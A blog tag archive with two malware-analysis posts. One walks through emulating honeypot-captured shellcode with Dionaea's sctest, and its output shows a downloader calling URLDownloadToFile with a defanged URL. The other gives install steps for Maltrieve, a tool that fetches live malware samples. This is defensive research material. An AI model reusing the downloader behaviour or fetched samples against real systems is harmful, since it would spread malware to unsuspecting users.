Tag Archives: malware

Dionaea simple analysis

Dionaea exploit analysis

For this analysis, we’ll using python3 that bundled with Dionaea:


Running command above will open a python console. Enter the code below line by line:

f = open('/tmp/test.bin','wb+')

It will produce test.bin file in /tmp/ folder.

Now we analyze it and dump the output to another file:

/opt/dionaea/bin/sctest -S -g -v -s 1000000 < /tmp/test.bin >> test.txt

You should see something like this:

[email protected]:~# cat test.txt
verbose = 1
success offset = 0x00000068
[emu 0x0xac40e0 info ] The following function is a stub instr_sldt_0f00 functions/misc.c:290
Hook me Captain Cook!
userhooks.c:132 user_hook_ExitThread
stepcount 85067
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417116 =>
           = "urlmon";
) = 0x7df20000;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
     LPCTSTR szURL = 0x00417121 =>
           = "";
     LPCTSTR szFileName = 0x00416fbe =>
           = "x.";
     DWORD dwReserved = 0;
) =  0;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00416fbe =>
           = "x.";
) = 0x00000000;
void ExitThread (
     DWORD dwExitCode = 0;
) =  0;

As you can see, the malicious URL is hxxp://

Reference : https://sourceforge.net/p/nepenthes/mailman/message/26862416/

Maltrieve on Mac OS X

Maltrieve originated as a fork of mwcrawler. It retrieves malware directly from the sources as listed at a number of sites, including:

  • Malc0de
  • Malware Black List
  • Malware Domain List
  • VX Vault
  • URLqery
  • CleanMX
  • .

    If you want to install maltrieve on your Mac OS X, below is the steps to install it.

    • First, install beautifulsoup4 via pip
    sudo pip install beautifulsoup4
    • Install required dependencies via apt-get
    sudo port install libxml2 libxslt py-lxml
    • Download maltrieve from github
    sudo git clone https://github.com/technoskald/maltrieve.git
    cd maltrieve
    python maltrieve.py -d pull -l maltrieve.log

    Done. Now you can use the Maltrieve on your Mac OS X.